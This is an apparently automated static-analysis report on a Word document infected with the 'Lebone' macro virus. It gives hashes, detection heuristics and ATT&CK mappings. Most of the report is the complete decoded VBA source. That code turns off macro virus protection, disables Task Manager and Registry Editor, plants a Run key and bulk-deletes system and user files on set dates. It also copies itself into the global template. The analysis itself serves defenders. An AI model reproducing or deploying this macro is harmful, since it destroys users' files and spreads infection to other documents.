Lebone — Office (OLE) malware analysis

Static analysis result for SHA-256 908141af031ad463…

MALICIOUS

Office (OLE)

37.5 KB Created: 2005-05-15 19:02:00 Authoring application: Microsoft Word 10.0 First seen: 2012-06-14
MD5: b2bee31e81a2ff6f118b3e23af5816cc SHA-1: bd3b567f9d336e74af89c4b4774b586d8ce39e54 SHA-256: 908141af031ad46330de931fdf10c9ac1fc71dddeb9410027a7450bb50e77fd0
256 Risk Score

Malware Insights

Lebone · confidence 95%

MITRE ATT&CK
T1547.001 Registry Run Keys / Startup Folder T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and a VBA AutoOpen macro. The script attempts to disable the Task Manager and Registry Editor by writing to specific registry keys, likely to hinder user intervention. It also displays a misleading message about a virus, aiming to alarm the user. The ClamAV detection as Win.Trojan.Pivis-2 and Doc.Trojan.Lebone-1 further confirms its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6205 bytes
SHA-256: af839db6b45e6ff490a7893aca61778c81f3a6d64633aa7c3ecb7847e7f1c097
Detection
ClamAV: Doc.Trojan.Lebone-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Libon"

'Macro virus name: Lebone
'-------------------------
'Infecta documentos word.
'Infect word documents.
'2005
'-------------------------

Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro Lebone"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoOpen"
On Error Resume Next
With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With

MsgBox " Virus alterou seu computador !!", vbOKOnly + vbCritical, "Word texto informa!!"

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools") = "1"

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Lune") = "Virus ativado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Universal"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Astral"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "13A31-Infected "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "VersionNumber") = "1313BA13 Astral "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "ProductName") = "Electron"

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Visual") = "C:\ARQUIV~1\Lube.html"
Open "C:\ARQUIV~1\Lube.html" For Output As #1
 Print #1, "<html><head><title>Macro virus!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
 Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='90%'>Computador com problemas!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>##############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Word modificado com sucesso!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Close #1

ActiveDocument.Shapes.AddTextEffect _
PresetTextEffect:=msoTextEffect9, _
Text:="A vida pode ser feliz!!", FontName:="Arial Black", _
FontSize:=36, FontBold:=msoTrue, _
FontItalic:=msoFalse, Left:=1, Top:=1, _
Anchor:=ActiveDocument.Paragraphs(1).Range

WordBasic.Kill "C:\WINDOWS\*.exe"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.exe"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.exe"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.com"

If Day(Now()) = 6 Or (Day(Now)) = 13 Or (Day(Now)) = 17 Or (Day(Now)) = 23 Or (Day(Now)) = 28 Then
MsgBox " Virus modificou seus arquivos!!", vbOKOnly + vbCritical, "Word texto informa!!"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"
WordBasic.Kill "C:\WINDOWS\*.xls"
WordBasic.Kill "C:\WINDOWS\*.pdf"
WordBasic.Kill "C:\*.com"
WordBasic.Kill "C:\*.ini"
WordBasic.Kill "C:\*.txt"
WordBasic.Kill "C:\*.gif"
WordBasic.Kill "C:\*.xls"
WordBasic.Kill "C:\*.pdf"
     
End If
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro Lebone"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoClose"
On Error Resume Next

ActiveDocument.SaveAs FileName:="C:\Lubir.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\System\Igon.sys"
ActiveDocument.SaveAs FileName:="C:\Program Files\Lubi.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\Command\Nidun.sys"

iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Libon"
    WordBasic.MacroCopy sMacro$, "Global:Libon"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Libon"
   
   ActiveDocument.Save

End If

End Sub

Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro Lebone"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Libon.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub

'Infecta documentos word.
'Infect word documents.
'Word Macro virus
'=========================
'Ano 2005
'-------------------------